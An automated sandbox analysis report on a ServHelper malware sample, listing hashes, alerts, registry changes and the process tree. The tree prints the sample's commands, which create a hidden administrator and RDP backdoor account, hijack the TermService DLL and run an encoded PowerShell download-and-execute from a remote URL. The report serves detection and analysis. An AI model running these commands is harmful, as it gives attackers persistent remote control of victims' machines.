Analysis
-
max time kernel
60s -
max time network
135s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
09-08-2021 04:21
Static task
static1
Behavioral task
behavioral1
Sample
86178014e457120d9dc6f6e27453338c.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
86178014e457120d9dc6f6e27453338c.exe
Resource
win10v20210408
General
-
Target
86178014e457120d9dc6f6e27453338c.exe
-
Size
6.0MB
-
MD5
86178014e457120d9dc6f6e27453338c
-
SHA1
16ab38c0e9c4516532f9d111523e948a6311bfc0
-
SHA256
d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
-
SHA512
746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 18 1308 powershell.exe 20 1308 powershell.exe 21 1308 powershell.exe 22 1308 powershell.exe 24 1308 powershell.exe 26 1308 powershell.exe 28 1308 powershell.exe 30 1308 powershell.exe 32 1308 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2144 2144 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1984.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A12.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_q0muteo5.kph.psm1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A81.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A32.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_efwzxkbu.afj.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A82.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2852 powershell.exe 2852 powershell.exe 2852 powershell.exe 1788 powershell.exe 1788 powershell.exe 1788 powershell.exe 2220 powershell.exe 2220 powershell.exe 2220 powershell.exe 1404 powershell.exe 1404 powershell.exe 1404 powershell.exe 2852 powershell.exe 2852 powershell.exe 2852 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
86178014e457120d9dc6f6e27453338c.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 808 86178014e457120d9dc6f6e27453338c.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeIncreaseQuotaPrivilege 1788 powershell.exe Token: SeSecurityPrivilege 1788 powershell.exe Token: SeTakeOwnershipPrivilege 1788 powershell.exe Token: SeLoadDriverPrivilege 1788 powershell.exe Token: SeSystemProfilePrivilege 1788 powershell.exe Token: SeSystemtimePrivilege 1788 powershell.exe Token: SeProfSingleProcessPrivilege 1788 powershell.exe Token: SeIncBasePriorityPrivilege 1788 powershell.exe Token: SeCreatePagefilePrivilege 1788 powershell.exe Token: SeBackupPrivilege 1788 powershell.exe Token: SeRestorePrivilege 1788 powershell.exe Token: SeShutdownPrivilege 1788 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeSystemEnvironmentPrivilege 1788 powershell.exe Token: SeRemoteShutdownPrivilege 1788 powershell.exe Token: SeUndockPrivilege 1788 powershell.exe Token: SeManageVolumePrivilege 1788 powershell.exe Token: 33 1788 powershell.exe Token: 34 1788 powershell.exe Token: 35 1788 powershell.exe Token: 36 1788 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeIncreaseQuotaPrivilege 2220 powershell.exe Token: SeSecurityPrivilege 2220 powershell.exe Token: SeTakeOwnershipPrivilege 2220 powershell.exe Token: SeLoadDriverPrivilege 2220 powershell.exe Token: SeSystemProfilePrivilege 2220 powershell.exe Token: SeSystemtimePrivilege 2220 powershell.exe Token: SeProfSingleProcessPrivilege 2220 powershell.exe Token: SeIncBasePriorityPrivilege 2220 powershell.exe Token: SeCreatePagefilePrivilege 2220 powershell.exe Token: SeBackupPrivilege 2220 powershell.exe Token: SeRestorePrivilege 2220 powershell.exe Token: SeShutdownPrivilege 2220 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeSystemEnvironmentPrivilege 2220 powershell.exe Token: SeRemoteShutdownPrivilege 2220 powershell.exe Token: SeUndockPrivilege 2220 powershell.exe Token: SeManageVolumePrivilege 2220 powershell.exe Token: 33 2220 powershell.exe Token: 34 2220 powershell.exe Token: 35 2220 powershell.exe Token: 36 2220 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeIncreaseQuotaPrivilege 1404 powershell.exe Token: SeSecurityPrivilege 1404 powershell.exe Token: SeTakeOwnershipPrivilege 1404 powershell.exe Token: SeLoadDriverPrivilege 1404 powershell.exe Token: SeSystemProfilePrivilege 1404 powershell.exe Token: SeSystemtimePrivilege 1404 powershell.exe Token: SeProfSingleProcessPrivilege 1404 powershell.exe Token: SeIncBasePriorityPrivilege 1404 powershell.exe Token: SeCreatePagefilePrivilege 1404 powershell.exe Token: SeBackupPrivilege 1404 powershell.exe Token: SeRestorePrivilege 1404 powershell.exe Token: SeShutdownPrivilege 1404 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeSystemEnvironmentPrivilege 1404 powershell.exe Token: SeRemoteShutdownPrivilege 1404 powershell.exe Token: SeUndockPrivilege 1404 powershell.exe Token: SeManageVolumePrivilege 1404 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
86178014e457120d9dc6f6e27453338c.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 808 wrote to memory of 2852 808 86178014e457120d9dc6f6e27453338c.exe powershell.exe PID 808 wrote to memory of 2852 808 86178014e457120d9dc6f6e27453338c.exe powershell.exe PID 2852 wrote to memory of 1324 2852 powershell.exe csc.exe PID 2852 wrote to memory of 1324 2852 powershell.exe csc.exe PID 1324 wrote to memory of 2148 1324 csc.exe cvtres.exe PID 1324 wrote to memory of 2148 1324 csc.exe cvtres.exe PID 2852 wrote to memory of 1788 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 1788 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 2220 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 2220 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 1404 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 1404 2852 powershell.exe powershell.exe PID 2852 wrote to memory of 3916 2852 powershell.exe reg.exe PID 2852 wrote to memory of 3916 2852 powershell.exe reg.exe PID 2852 wrote to memory of 3456 2852 powershell.exe reg.exe PID 2852 wrote to memory of 3456 2852 powershell.exe reg.exe PID 2852 wrote to memory of 3208 2852 powershell.exe reg.exe PID 2852 wrote to memory of 3208 2852 powershell.exe reg.exe PID 2852 wrote to memory of 1316 2852 powershell.exe net.exe PID 2852 wrote to memory of 1316 2852 powershell.exe net.exe PID 1316 wrote to memory of 196 1316 net.exe net1.exe PID 1316 wrote to memory of 196 1316 net.exe net1.exe PID 2852 wrote to memory of 912 2852 powershell.exe cmd.exe PID 2852 wrote to memory of 912 2852 powershell.exe cmd.exe PID 912 wrote to memory of 1404 912 cmd.exe cmd.exe PID 912 wrote to memory of 1404 912 cmd.exe cmd.exe PID 1404 wrote to memory of 3248 1404 cmd.exe net.exe PID 1404 wrote to memory of 3248 1404 cmd.exe net.exe PID 3248 wrote to memory of 2256 3248 net.exe net1.exe PID 3248 wrote to memory of 2256 3248 net.exe net1.exe PID 2852 wrote to memory of 3508 2852 powershell.exe cmd.exe PID 2852 wrote to memory of 3508 2852 powershell.exe cmd.exe PID 3508 wrote to memory of 3172 3508 cmd.exe cmd.exe PID 3508 wrote to memory of 3172 3508 cmd.exe cmd.exe PID 3172 wrote to memory of 3368 3172 cmd.exe net.exe PID 3172 wrote to memory of 3368 3172 cmd.exe net.exe PID 3368 wrote to memory of 3648 3368 net.exe net1.exe PID 3368 wrote to memory of 3648 3368 net.exe net1.exe PID 616 wrote to memory of 1748 616 cmd.exe net.exe PID 616 wrote to memory of 1748 616 cmd.exe net.exe PID 1748 wrote to memory of 3808 1748 net.exe net1.exe PID 1748 wrote to memory of 3808 1748 net.exe net1.exe PID 500 wrote to memory of 2512 500 cmd.exe net.exe PID 500 wrote to memory of 2512 500 cmd.exe net.exe PID 2512 wrote to memory of 3912 2512 net.exe net1.exe PID 2512 wrote to memory of 3912 2512 net.exe net1.exe PID 2000 wrote to memory of 2184 2000 cmd.exe net.exe PID 2000 wrote to memory of 2184 2000 cmd.exe net.exe PID 2184 wrote to memory of 3476 2184 net.exe net1.exe PID 2184 wrote to memory of 3476 2184 net.exe net1.exe PID 3652 wrote to memory of 1324 3652 cmd.exe net.exe PID 3652 wrote to memory of 1324 3652 cmd.exe net.exe PID 1324 wrote to memory of 2384 1324 net.exe net1.exe PID 1324 wrote to memory of 2384 1324 net.exe net1.exe PID 3380 wrote to memory of 3912 3380 cmd.exe net.exe PID 3380 wrote to memory of 3912 3380 cmd.exe net.exe PID 3912 wrote to memory of 588 3912 net.exe net1.exe PID 3912 wrote to memory of 588 3912 net.exe net1.exe PID 1420 wrote to memory of 3772 1420 cmd.exe net.exe PID 1420 wrote to memory of 3772 1420 cmd.exe net.exe PID 3772 wrote to memory of 2220 3772 net.exe net1.exe PID 3772 wrote to memory of 2220 3772 net.exe net1.exe PID 3808 wrote to memory of 3204 3808 cmd.exe WMIC.exe PID 3808 wrote to memory of 3204 3808 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lhq4zxin\lhq4zxin.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE45.tmp" "c:\Users\Admin\AppData\Local\Temp\lhq4zxin\CSC1FC88830663E45AF842C8B7F5220DB23.TMP"4⤵PID:2148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3916
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3456 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3208
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:196
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2256
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3648
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3916
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2960
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3808
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc H9MWIhec /add1⤵
- Suspicious use of WriteProcessMemory
PID:500 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc H9MWIhec /add2⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc H9MWIhec /add3⤵PID:3912
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3476
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:2384
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:588
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc H9MWIhec1⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc H9MWIhec2⤵
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc H9MWIhec3⤵PID:2220
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:3204
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3912
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3920
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3476
-
